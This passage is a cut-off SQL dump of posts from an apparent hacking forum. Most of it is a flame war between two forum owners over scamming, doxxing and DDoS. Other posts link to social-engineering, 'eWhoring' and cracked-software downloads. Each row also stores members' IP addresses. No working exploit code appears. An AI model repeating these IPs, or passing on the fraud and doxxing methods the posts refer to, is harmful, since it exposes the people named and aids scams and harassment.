day, but I would like your members to be aware of the fact their owner is a sca-mmer, and someone that DOXes their own users. I won\'t even bother arguing whose site is better, because a site is only as strong as it\'s weakest member. This site\'s weakest member is you. If you\'d like to discuss respect, explain why you made the decision of showing me disrespect by sca-mming me? Explain to your users why you DOXed someone who had been devoted to your site. If you can\'t even admit you fucked up, then you aren\'t a very good leader. As far as me making new accounts? I don\'t mind if it gives you a false sense of activity on your site. Everybody can see that this account will be banned and that it hadn\'t made any contributions. [/quote] Oh no not at all. I will allow to create as much accounts you want to because from most of the accounts you are posting which helps increase my forums activity and when it comes to accounts I keep merging it into one account so I\'m not losing anything actually gaining so why stop you? I did it because you or one of your member DDoSed my website. I created a 50% DOX of a member that YOU stole. A member who is now your loyal member. I lost iTzIpod and his friendship but I was never emotionally attached so I don\'t mind if he leaves or not. You are doing exactly what he did on my forum, you are going to use him to get more activity but a website is only successful by active members willing to contribute. You have around 300 posts and only around 10 come online daily and your top poster of the day has 3 posts? What a shame. If you don\'t like me or my forum then leave. Actually I can do anything with your IP because Brazil is not a hard country to SE. [/quote] Apparently you\'re sourly mistaken on what this thread is about. This thread is about how you sca-mmed me, DOXed a member on your own forum, and lied about it. Why are you being so honest now? Not too long ago you said you had nothing to do with it. In fact, you were telling everybody that I had DOXed Ipod. When I spoke to Ipod, he explained that you did it. Why bother lying if you can\'t keep your story straight? This thread is about you, and your terrible qualities as a leader, not my site. (Also, our top poster does NOT have 3 posts) [/quote] Wrong this is a thread about you lying, your childish acts and who was behind our site going down. Todays most posts by Hardz was 3 and that thing came up in \"Todays Top Posters\" . I told Ipod straight that I had DOXed him and last time I checked he is a member of your site. All my members know who I am and they can trust me. iTzIpod can never stay on a website, ask the owner of theprofiters of who I am and who is Ipod. Bitches had their DB exploited for stealing my members and Ipod left TP because he never stays on a site for long.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '73cf7b1bebc4eac14c2eee2daa8e090f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4007', '747', '4006', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349754314', '[quote=\'t3h jok3r\' pid=\'4006\' dateline=\'1349754068\'] [quote=\'The Anarchist\' pid=\'4005\' dateline=\'1349753806\'] [quote=\'t3h jok3r\' pid=\'4002\' dateline=\'1349753495\'] [quote=\'The Anarchist\' pid=\'3999\' dateline=\'1349753135\'] [quote=\'t3h jok3r\' pid=\'3998\' dateline=\'1349752479\'] Ight lets say for A MOMENT admit that I\'m a terrible leader. Firstly, I\'m running a country I\'m running a website. Secondly, if I\'m a terrible Admin then what are you doing by creating 2-3 fake accounts everday and spamming my website? Cleaning up your m**s cum? Now if you got sca-mmed whatever today was a new day but you carried on crying like a baby and decided to spam my website. I didn\'t do anything yet to your site even though I could have and I didn\'t do it because I\'m more mature than you and think before doing anything. If it was your members creating fake accounts and not your fault then I will let my members do anything to your site and I won\'t be responsible for anything. You revealed my private conversation on your site which proves you don\'t respect privacy and your site won\'t last long. Your site is nothing compared to mine, even if my site is on 1K threads and your site is on 100K threads my website would still be the best because I have shit that you don\'t have. [/quote] I never made an agreement not to disclose your private messages, sorry if you were mistaken. You shouldn\'t make threats or statements that you aren\'t comfortable with being made public. As far as sca-mming? Yeah - it\'s a new day, but I would like your members to be aware of the fact their owner is a sca-mmer, and someone that DOXes their own users. I won\'t even bother arguing whose site is better, because a site is only as strong as it\'s weakest member. This site\'s weakest member is you. If you\'d like to discuss respect, explain why you made the decision of showing me disrespect by sca-mming me? Explain to your users why you DOXed someone who had been devoted to your site. If you can\'t even admit you fucked up, then you aren\'t a very good leader. As far as me making new accounts? I don\'t mind if it gives you a false sense of activity on your site. Everybody can see that this account will be banned and that it hadn\'t made any contributions. [/quote] Oh no not at all. I will allow to create as much accounts you want to because from most of the accounts you are posting which helps increase my forums activity and when it comes to accounts I keep merging it into one account so I\'m not losing anything actually gaining so why stop you? I did it because you or one of your member DDoSed my website. I created a 50% DOX of a member that YOU stole. A member who is now your loyal member. I lost iTzIpod and his friendship but I was never emotionally attached so I don\'t mind if he leaves or not. You are doing exactly what he did on my forum, you are going to use him to get more activity but a website is only successful by active members willing to contribute. You have around 300 posts and only around 10 come online daily and your top poster of the day has 3 posts? What a shame. If you don\'t like me or my forum then leave. Actually I can do anything with your IP because Brazil is not a hard country to SE. [/quote] Apparently you\'re sourly mistaken on what this thread is about. This thread is about how you sca-mmed me, DOXed a member on your own forum, and lied about it. Why are you being so honest now? Not too long ago you said you had nothing to do with it. In fact, you were telling everybody that I had DOXed Ipod. When I spoke to Ipod, he explained that you did it. Why bother lying if you can\'t keep your story straight? This thread is about you, and your terrible qualities as a leader, not my site. (Also, our top poster does NOT have 3 posts) [/quote] Wrong this is a thread about you lying, your childish acts and who was behind our site going down. Todays most posts by Hardz was 3 and that thing came up in \"Todays Top Posters\" . I told Ipod straight that I had DOXed him and last time I checked he is a member of your site. All my members know who I am and they can trust me. iTzIpod can never stay on a website, ask the owner of theprofiters of who I am and who is Ipod. Bitches had their DB exploited for stealing my members and Ipod left TP because he never stays on a site for long. [/quote] I would be surprised if you even knew what a database was. Ironically, I failed to mention that the information in the DOX you made was also completely inaccurate. Ipod confirmed that the DOX was worthless, and he didn\'t seem too worried. However, I had nothing to do with the site going down, as I have said. I can keep my story straight. I haven\'t lied to anybody, however, you have lied to plenty of people.', '108.171.103.234', '1823172586', '0', '0', '1', '1349754415', '1', '1eccb6dd1b98d04917e176181bde43f1', '0', '1349754415'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4008', '747', '4007', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349754505', '[quote=\'The Anarchist\' pid=\'4007\' dateline=\'1349754314\'] [quote=\'t3h jok3r\' pid=\'4006\' dateline=\'1349754068\'] [quote=\'The Anarchist\' pid=\'4005\' dateline=\'1349753806\'] [quote=\'t3h jok3r\' pid=\'4002\' dateline=\'1349753495\'] [quote=\'The Anarchist\' pid=\'3999\' dateline=\'1349753135\'] I never made an agreement not to disclose your private messages, sorry if you were mistaken. You shouldn\'t make threats or statements that you aren\'t comfortable with being made public. As far as sca-mming? Yeah - it\'s a new day, but I would like your members to be aware of the fact their owner is a sca-mmer, and someone that DOXes their own users. I won\'t even bother arguing whose site is better, because a site is only as strong as it\'s weakest member. This site\'s weakest member is you. If you\'d like to discuss respect, explain why you made the decision of showing me disrespect by sca-mming me? Explain to your users why you DOXed someone who had been devoted to your site. If you can\'t even admit you fucked up, then you aren\'t a very good leader. As far as me making new accounts? I don\'t mind if it gives you a false sense of activity on your site. Everybody can see that this account will be banned and that it hadn\'t made any contributions. [/quote] Oh no not at all. I will allow to create as much accounts you want to because from most of the accounts you are posting which helps increase my forums activity and when it comes to accounts I keep merging it into one account so I\'m not losing anything actually gaining so why stop you? I did it because you or one of your member DDoSed my website. I created a 50% DOX of a member that YOU stole. A member who is now your loyal member. I lost iTzIpod and his friendship but I was never emotionally attached so I don\'t mind if he leaves or not. You are doing exactly what he did on my forum, you are going to use him to get more activity but a website is only successful by active members willing to contribute. You have around 300 posts and only around 10 come online daily and your top poster of the day has 3 posts? What a shame. If you don\'t like me or my forum then leave. Actually I can do anything with your IP because Brazil is not a hard country to SE. [/quote] Apparently you\'re sourly mistaken on what this thread is about. This thread is about how you sca-mmed me, DOXed a member on your own forum, and lied about it. Why are you being so honest now? Not too long ago you said you had nothing to do with it. In fact, you were telling everybody that I had DOXed Ipod. When I spoke to Ipod, he explained that you did it. Why bother lying if you can\'t keep your story straight? This thread is about you, and your terrible qualities as a leader, not my site. (Also, our top poster does NOT have 3 posts) [/quote] Wrong this is a thread about you lying, your childish acts and who was behind our site going down. Todays most posts by Hardz was 3 and that thing came up in \"Todays Top Posters\" . I told Ipod straight that I had DOXed him and last time I checked he is a member of your site. All my members know who I am and they can trust me. iTzIpod can never stay on a website, ask the owner of theprofiters of who I am and who is Ipod. Bitches had their DB exploited for stealing my members and Ipod left TP because he never stays on a site for long. [/quote] I would be surprised if you even knew what a database was. Ironically, I failed to mention that the information in the DOX you made was also completely inaccurate. Ipod confirmed that the DOX was worthless, and he didn\'t seem too worried. However, I had nothing to do with the site going down, as I have said. I can keep my story straight. I haven\'t lied to anybody, however, you have lied to plenty of people. [/quote] You\'re a pussy son. You think you can get things worked out by acting all good? If I don\'t know what a database is then how the heck am I running L33THacking? If Ipods information is inaccurate then why was he requesting me to remove it? Even if it is inaccurate his IP address shows the correct location. Your next reply should be the last reply then your are most welcome to leave.', '72.231.24.165', '1223104677', '1', '0', '1', '1349754534', '1', '8009e272c8a2157be32af2955778b284', '0', '1349754534'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4009', '701', '3894', '49', 'RE: Change Font in Logo?', '0', '1', 't3h jok3r', '1349754677', '[quote=\'BreShiE\' pid=\'3894\' dateline=\'1349668954\'] I think it\'ll be better if the font was the same as the one in your signature. [/quote] I agree and the icon resized. I just can\'t get the logo centered, do you have any idea how? I tried my best also tried all MyBB Community suggestions. I believe I need to edit the global.php file.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd0207e7ac4fdb728d08bf2cf248aa0c6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4010', '747', '4008', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349755069', '[quote=\'t3h jok3r\' pid=\'4008\' dateline=\'1349754505\'] [quote=\'The Anarchist\' pid=\'4007\' dateline=\'1349754314\'] [quote=\'t3h jok3r\' pid=\'4006\' dateline=\'1349754068\'] [quote=\'The Anarchist\' pid=\'4005\' dateline=\'1349753806\'] [quote=\'t3h jok3r\' pid=\'4002\' dateline=\'1349753495\'] Oh no not at all. I will allow to create as much accounts you want to because from most of the accounts you are posting which helps increase my forums activity and when it comes to accounts I keep merging it into one account so I\'m not losing anything actually gaining so why stop you? I did it because you or one of your member DDoSed my website. I created a 50% DOX of a member that YOU stole. A member who is now your loyal member. I lost iTzIpod and his friendship but I was never emotionally attached so I don\'t mind if he leaves or not. You are doing exactly what he did on my forum, you are going to use him to get more activity but a website is only successful by active members willing to contribute. You have around 300 posts and only around 10 come online daily and your top poster of the day has 3 posts? What a shame. If you don\'t like me or my forum then leave. Actually I can do anything with your IP because Brazil is not a hard country to SE. [/quote] Apparently you\'re sourly mistaken on what this thread is about. This thread is about how you sca-mmed me, DOXed a member on your own forum, and lied about it. Why are you being so honest now? Not too long ago you said you had nothing to do with it. In fact, you were telling everybody that I had DOXed Ipod. When I spoke to Ipod, he explained that you did it. Why bother lying if you can\'t keep your story straight? This thread is about you, and your terrible qualities as a leader, not my site. (Also, our top poster does NOT have 3 posts) [/quote] Wrong this is a thread about you lying, your childish acts and who was behind our site going down. Todays most posts by Hardz was 3 and that thing came up in \"Todays Top Posters\" . I told Ipod straight that I had DOXed him and last time I checked he is a member of your site. All my members know who I am and they can trust me. iTzIpod can never stay on a website, ask the owner of theprofiters of who I am and who is Ipod. Bitches had their DB exploited for stealing my members and Ipod left TP because he never stays on a site for long. [/quote] I would be surprised if you even knew what a database was. Ironically, I failed to mention that the information in the DOX you made was also completely inaccurate. Ipod confirmed that the DOX was worthless, and he didn\'t seem too worried. However, I had nothing to do with the site going down, as I have said. I can keep my story straight. I haven\'t lied to anybody, however, you have lied to plenty of people. [/quote] You\'re a pu-ssy son. You think you can get things worked out by acting all good? If I don\'t know what a database is then how the heck am I running L33THacking? If Ipods information is inaccurate then why was he requesting me to remove it? Even if it is inaccurate his IP address shows the correct location. Your next reply should be the last reply then your are most welcome to leave. [/quote] I don\'t think there\'s much else to say. :roflol: Whenever I show any sign of a legitimate argument, you resort to childish namecalling, or immature remarks. As far as IP addresses and DOXes, it looks like that\'s all you\'ll ever amount to in terms of threats. I hope your members take a closer look at who\'s running the forum they are using, even if they don\'t plan on using ours. Be sure to leave these posts, so your users can read what I have said. I won\'t return unless the need arises, so if you want to contact me use Skype.', '108.171.103.234', '1823172586', '0', '0', '0', '0', '1', '2086878dbdf0a4ec96f02df51a5e5279', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4011', '747', '4010', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349755189', '[quote=\'The Anarchist\' pid=\'4010\' dateline=\'1349755069\'] [quote=\'t3h jok3r\' pid=\'4008\' dateline=\'1349754505\'] [quote=\'The Anarchist\' pid=\'4007\' dateline=\'1349754314\'] [quote=\'t3h jok3r\' pid=\'4006\' dateline=\'1349754068\'] [quote=\'The Anarchist\' pid=\'4005\' dateline=\'1349753806\'] Apparently you\'re sourly mistaken on what this thread is about. This thread is about how you sca-mmed me, DOXed a member on your own forum, and lied about it. Why are you being so honest now? Not too long ago you said you had nothing to do with it. In fact, you were telling everybody that I had DOXed Ipod. When I spoke to Ipod, he explained that you did it. Why bother lying if you can\'t keep your story straight? This thread is about you, and your terrible qualities as a leader, not my site. (Also, our top poster does NOT have 3 posts) [/quote] Wrong this is a thread about you lying, your childish acts and who was behind our site going down. Todays most posts by Hardz was 3 and that thing came up in \"Todays Top Posters\" . I told Ipod straight that I had DOXed him and last time I checked he is a member of your site. All my members know who I am and they can trust me. iTzIpod can never stay on a website, ask the owner of theprofiters of who I am and who is Ipod. Bitches had their DB exploited for stealing my members and Ipod left TP because he never stays on a site for long. [/quote] I would be surprised if you even knew what a database was. Ironically, I failed to mention that the information in the DOX you made was also completely inaccurate. Ipod confirmed that the DOX was worthless, and he didn\'t seem too worried. However, I had nothing to do with the site going down, as I have said. I can keep my story straight. I haven\'t lied to anybody, however, you have lied to plenty of people. [/quote] You\'re a pu-ssy son. You think you can get things worked out by acting all good? If I don\'t know what a database is then how the heck am I running L33THacking? If Ipods information is inaccurate then why was he requesting me to remove it? Even if it is inaccurate his IP address shows the correct location. Your next reply should be the last reply then your are most welcome to leave. [/quote] I don\'t think there\'s much else to say. :roflol: Whenever I show any sign of a legitimate argument, you resort to childish namecalling, or immature remarks. As far as IP addresses and DOXes, it looks like that\'s all you\'ll ever amount to in terms of threats. I hope your members take a closer look at who\'s running the forum they are using, even if they don\'t plan on using ours. Be sure to leave these posts, so your users can read what I have said. I won\'t return unless the need arises, so if you want to contact me use Skype. [/quote] You already sucked my dick too much, I don\'t off course want you back. So now I believe you are out of my way and I\'m out of your way. You run the forum the way you want and I will do the same with my forum.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'daf7f120d83c66665d2211e735703ede', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4012', '776', '0', '16', 'What are some things you want SE\'d?', '0', '222', 'Exposé', '1349758573', 'What things do you guys want SE\'d. And not things that already have methods. As being the leader of fearless, I personally would like to bring LH members the best methods. So give me suggestions and I will start working on them :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'cd9dff70c249e2cdde15e97cc5b910ee', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4013', '741', '3766', '9', 'RE: 7 Videos That Will Show You How To Make Real Income Online!', '0', '213', 'BitMonst3r', '1349758717', 'There is a lot of members who use this :)', '178.250.34.208', '-1292229936', '0', '0', '0', '0', '1', '6de37cfce4c051ba5b4655f3fb77fccc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4014', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '222', 'Exposé', '1349758803', 'Nicely said Joker...let\'s just move on and all stop acting like 6 yr olds k?', '69.205.61.93', '1171078493', '1', '0', '222', '1349758820', '1', '0820c4bc09e6cdc00f160b3613a66d4e', '0', '1349758820'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4015', '451', '2111', '19', '[Junk][Junk][Recently Created]Free working shell booter', '0', '1', 't3h jok3r', '1349761011', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4016', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '249', 'Ultimatum', '1349764657', 'What the fuck is this? [A.Forums] is absolute bull shit. Just cause you guys don\'t have anything I\'ve seen here, doesn\'t give an excuse for you fucktards to go bringing your shit here. The fucking Anarchist kicked me from the forums for NO reason. At least t3h jok3r isn\'t an asshole.', '121.215.220.45', '2044189741', '0', '0', '0', '0', '1', 'ba4934aba5d1fae3300c66a8fd90b424', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4017', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '53', 'sirchamp', '1349765051', 'The software is called wTools. wTools stands for WebTools. There are different things you can do with it. (IP Pinger, Host To Ip, Ip tracer, Cloudflare resolver, email spoofer and \"skype tools\"', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'b6975c6ab12df2d3d94e24f95ac06d06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4018', '777', '0', '4', 'The Ultimatum has Arrived!', '0', '249', 'Ultimatum', '1349765088', 'Well, hey guys! This is Ultimatum and I\'m moving here because of that asshole Anarchist. Anyway, I\'ve known hacking since a bit less than 2 years ago. I can do pentesting such as, LFI, RFI, XSS (my favourite), SQLi, etc. I have a lot of experiences with booters and how they work, etc. I can do a little bit of VB.NET, C#, C++, PHP, HTML, and CSS. I\'m really hopeful with this forum, and things seem to have started well, and I seriously hope things are much better here than AnarchyForums. :)', '121.215.220.45', '2044189741', '0', '0', '0', '0', '1', '27d7335c7d123480cbdc599488baf62f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4020', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '62', 'R?????zo?', '1349769577', 'feel free to edit the logo, if you want the original .psd file I can provide it you have my permision :)', '89.214.85.204', '1507218892', '1', '0', '0', '0', '1', 'cffa66270a7d14c3bbd2fc6c996ae67d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4021', '763', '3891', '58', 'RE: [Announcement]Group Changes', '0', '62', 'R?????zo?', '1349769715', 'I will do my best to keep Unique active.', '89.214.85.204', '1507218892', '1', '0', '0', '0', '1', '8fff67c4ea7dfac8c359e2e2a7383736', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4022', '778', '0', '19', '[Junk]Gigbucks to Fiverr method', '0', '62', 'R?????zo?', '1349770109', '[align=center][size=large][color=yellow][b][i]Gigbucks to Fiverr Guide[/i][/b][/size][/color] Download Link: http://www.mediafire.com/view/?b94c4h9dcflc54q I hope you\'ll earn from this. I take no credits for this.[/align]', '89.214.85.204', '1507218892', '1', '0', '62', '1349770212', '1', 'd5ce84d3c7ebb7e56af6433e6ad7a2df', '0', '1349770212'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4023', '779', '0', '61', 'Get everything for FREE', '0', '62', 'R?????zo?', '1349770474', '[align=center][color=#FFD700][size=large][i][b]How to get everything for free[/b][/i][/size][/color] This requires abit of SE skills. Anyways heres the link: http://www.mediafire.com/?1975p54jnhkv6au Credits to Saga[/align]', '89.214.85.204', '1507218892', '1', '0', '62', '1349770513', '1', '09cabed9ed1428486ea386dc161ec3df', '0', '1349770513'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4024', '780', '0', '17', 'Ultimate eWhoring Guide ? Never Seen Before ? $800/week! ?', '0', '62', 'R?????zo?', '1349770825', 'Here\'s some really good guide. I made a few bucks doing this, just try it, you won\'t be dissapointed :) Proof: [spoiler]http://img100.imageshack.us/slideshow/webplayer.php?id=1qa55.png[/spoiler] Heres the download link: http://dl.dropbox.com/u/57540058/eWhore%20Guide.pdf Credits goes to Tuxedo.', '89.214.85.204', '1507218892', '1', '0', '62', '1349771646', '1', 'e7f9f3f9035c36d6c4018a2dd195a527', '0', '1349771646'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4025', '781', '0', '61', '[LEAK] J0HNNYs ultimate Money Making Method $100-$200 daily!', '0', '62', 'R?????zo?', '1349771540', 'I\'ve actually tried this method and it has potential. You can earn good money doing this. I, personally made around $150 bucks doing this, i\'m not sure if it\'s saturated or not now but try it! __________________________________________________________________ DOWNLOAD: http:/www.mediafire.com/?m4e1bsrdtrn294u VIRUS SCAN: [IMG]http://cache.gyazo.com//96399a1e0bc5f683cd551f707a60af0b.png?1349389789?1349389789[/IMG]', '89.214.85.204', '1507218892', '1', '0', '0', '0', '1', '4280a04b252fc7b71f289bac1b6ca3f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4026', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1349774115', 'I will be the one dealing with the applys in Unique from now on, feel free to apply if you think you meet the requirements.', '89.214.85.204', '1507218892', '1', '0', '0', '0', '1', '49664888ed606e954d80681c8d9e1b4f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4027', '762', '3889', '58', 'RE: LH Coders: Official Group - Applications: OPEN', '0', '62', 'R?????zo?', '1349778014', '[color=#32CD32][b]What Can You Code:[/b][/color] C, mostly C#. Some VB, PHP, HTML, CSS, Java and lua. [b][color=#32CD32]Favorite Coding Language:[/color][/b] C#, I\'ve studied for 3years+ I\'ve had a job in that area, making health care programs. [color=#32CD32][b]Will You Give Support To Fellow Coders:[/b][/color] I will help you with whatever I can, I will help review your code, tell you tips & tricks etc. [color=#32CD32][b]How Many Hours Per Week Can You Be On:[/b][/color] I can be here like 8hours a day, some other days more or less, depends on my girlfriend :P [b][color=#32CD32]Age:[/color][/b] 20', '89.214.85.204', '1507218892', '1', '0', '0', '0', '1', 'ba6137eecec15ef581ab497571181544', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4028', '769', '3944', '23', 'RE: Math Tools for all Subjects Cracked by Rave', '0', '53', 'sirchamp', '1349779235', 'Thanks, These cost a hell lot.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '42d90154e4f7edb65270838e8f6e7db5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4029', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '205', 'mothered', '1349783025', 'I don\'t think too highly of the Iphones, so I\'ll be doing some research on this.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b1a5ab6492eff9d26d54cb7539610681', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4030', '762', '3889', '58', 'RE: LH Coders: Official Group - Applications: OPEN', '0', '100', '??zg???g????61', '1349784179', 'Lol I now I feel like a noob. [color=#32CD32][b]What Can You Code:[/b][/color] I\'ve been doing Java for about a year, I\'ve stopped learning Java actively but I have an understanding that can be easily improved. I know HTML, I\'ve been introduced to Javascript and I\'m JUST starting php. [b][color=#32CD32]Favorite Coding Language:[/color][/b] I think that would be Java. [color=#32CD32][b]Will You Give Support To Fellow Coders:[/b][/color] I can help develop ideas, as well as help with Java related problems or questions. [color=#32CD32][b]How Many Hours Per Week Can You Be On:[/b][/color] I can be on about 5-6 hours a week. Probably more but I can\'t really be sure. [b][color=#32CD32]Age:[/color][/b] Anonymous? [b][color=#32CD32]Proof Of Your Coding Abilities:[/color][/b] http://pastebin.com/u4YsgUzy I\'m going to remove this in like a week. That was a quick guessing game I whipped up over the week end for my friend.', '70.192.2.128', '1186988672', '1', '0', '100', '1349909913', '1', '202ea1ec84f7f22fcec4415da2c2d73b', '0', '1349909913'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4031', '647', '3167', '14', 'RE: VPNReactor (Free/Paid) **Deletes Logs**', '0', '205', 'mothered', '1349784317', 'I\'ve used Hotspot Shield and CyberGhost, but not this. Appreciate the contribution, thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f12e0f9b4ac0bf58ffcbfe79d809af2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4033', '770', '3945', '19', 'RE: Gyzano JDB', '0', '61', 'NXK', '1349784460', 'Good to see more HF leaks, Maybe I should start posting all mine.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'bc5154c2a0da1043b99a0d07b05503ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, 